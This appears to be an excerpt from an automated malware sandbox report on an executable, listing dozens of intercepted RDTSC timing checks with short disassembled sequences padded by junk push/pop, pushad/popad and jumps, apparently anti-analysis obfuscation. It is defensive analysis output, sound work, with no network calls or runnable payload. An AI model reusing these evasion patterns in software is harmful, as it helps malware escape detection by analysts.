Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F651 second address: 91F680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 jmp 00007F5F64D1DAC4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F680 second address: 91F69A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF24h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FA59 second address: 91FA83 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DAB6h 0x00000008 jmp 00007F5F64D1DAC3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F5F64D1DABAh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FA83 second address: 91FA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DF1Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FC0F second address: 91FC24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DABEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FC24 second address: 91FC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F5F64D1DF16h 0x0000000d jmp 00007F5F64D1DF1Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FC3F second address: 91FC43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924592 second address: 924596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924596 second address: 92459A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92459A second address: 9245A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9246D4 second address: 9246E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5F64D1DAB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9246E0 second address: 9246E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9246E4 second address: 9246F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9246F4 second address: 924717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5F64D1DF16h 0x0000000a js 00007F5F64D1DF16h 0x00000010 popad 0x00000011 jmp 00007F5F64D1DF1Fh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924717 second address: 92471D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92471D second address: 924723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924B77 second address: 924B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924B84 second address: 924BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF28h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924BA1 second address: 924BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924FC3 second address: 924FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92BD41 second address: 92BD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5F64D1DABCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB70A second address: 8AB70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB70E second address: 8AB712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB712 second address: 8AB73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F5F64D1DF25h 0x0000000c jmp 00007F5F64D1DF1Ch 0x00000011 pop edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB73E second address: 8AB74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5F64D1DAB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB74A second address: 8AB75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F5F64D1DF16h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92A972 second address: 92A978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92A978 second address: 92A97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92A97C second address: 92A986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92AAF0 second address: 92AAF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92B1D6 second address: 92B1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92B357 second address: 92B365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F5F64D1DF1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92B365 second address: 92B385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5F64D1DABEh 0x0000000b jnl 00007F5F64D1DABCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92BBB3 second address: 92BBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e jng 00007F5F64D1DF16h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92F358 second address: 92F369 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92F369 second address: 92F371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92F371 second address: 92F38D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89C80D second address: 89C81E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5F64D1DF1Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89C81E second address: 89C823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89C823 second address: 89C829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89C829 second address: 89C833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 932271 second address: 932278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 932278 second address: 93229B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5F64D1DAB6h 0x0000000a pop eax 0x0000000b jne 00007F5F64D1DAC2h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93229B second address: 9322A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9322A2 second address: 9322C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DAC3h 0x00000008 jnl 00007F5F64D1DAB6h 0x0000000e jc 00007F5F64D1DAB6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9322C9 second address: 9322DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9339FD second address: 933A18 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DAC6h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 933A18 second address: 933A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007F5F64D1DF45h 0x0000000d js 00007F5F64D1DF22h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 935CEA second address: 935CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 935CF0 second address: 935CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AA12 second address: 93AA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AA1D second address: 93AA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AB53 second address: 93AB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F5F64D1DAB6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5F64D1DAC9h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AB7D second address: 93AB91 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5F64D1DF1Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93ACDC second address: 93ACE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93ACE0 second address: 93ACE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93ACE8 second address: 93AD1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 jnl 00007F5F64D1DAB6h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5F64D1DABBh 0x00000019 jmp 00007F5F64D1DAC3h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AD1A second address: 93AD4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF25h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5F64D1DF22h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93B140 second address: 93B14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DABAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FC95 second address: 93FC99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FC99 second address: 93FCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FCA3 second address: 93FCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FE2D second address: 93FE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FE35 second address: 93FE39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FFA6 second address: 93FFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FFAC second address: 93FFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FFB0 second address: 93FFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7DF3 second address: 8E7DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7DF8 second address: 8E7E77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F5F64D1DAB8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push edi 0x00000027 pop ecx 0x00000028 clc 0x00000029 mov ebx, dword ptr [ebp+1247BD6Fh] 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F5F64D1DAB8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov edi, dword ptr [ebp+122D2BB3h] 0x0000004f mov dx, 9B71h 0x00000053 add eax, ebx 0x00000055 push edx 0x00000056 adc ch, FFFFFF80h 0x00000059 pop ecx 0x0000005a nop 0x0000005b push edi 0x0000005c pushad 0x0000005d pushad 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7E77 second address: 8E7E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7E84 second address: 8E7E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94433A second address: 944342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9439D1 second address: 9439E3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5F64D1DAB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9439E3 second address: 9439E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9439E7 second address: 9439EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9439EF second address: 943A33 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jmp 00007F5F64D1DF26h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F5F64D1DF2Ch 0x00000015 jmp 00007F5F64D1DF26h 0x0000001a jns 00007F5F64D1DF18h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943A33 second address: 943A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943A39 second address: 943A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943A3D second address: 943A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943A47 second address: 943A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943BA9 second address: 943BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943BAD second address: 943BB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943BB9 second address: 943BD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943BD3 second address: 943BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94404C second address: 944066 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F5F64D1DABEh 0x0000000e jl 00007F5F64D1DAB6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 944066 second address: 94406C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94406C second address: 944070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C282 second address: 94C286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C286 second address: 94C29B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C29B second address: 94C2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DF25h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C2B8 second address: 94C2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C2BE second address: 94C308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5F64D1DF24h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F5F64D1DF27h 0x00000015 jmp 00007F5F64D1DF23h 0x0000001a popad 0x0000001b rdtsc
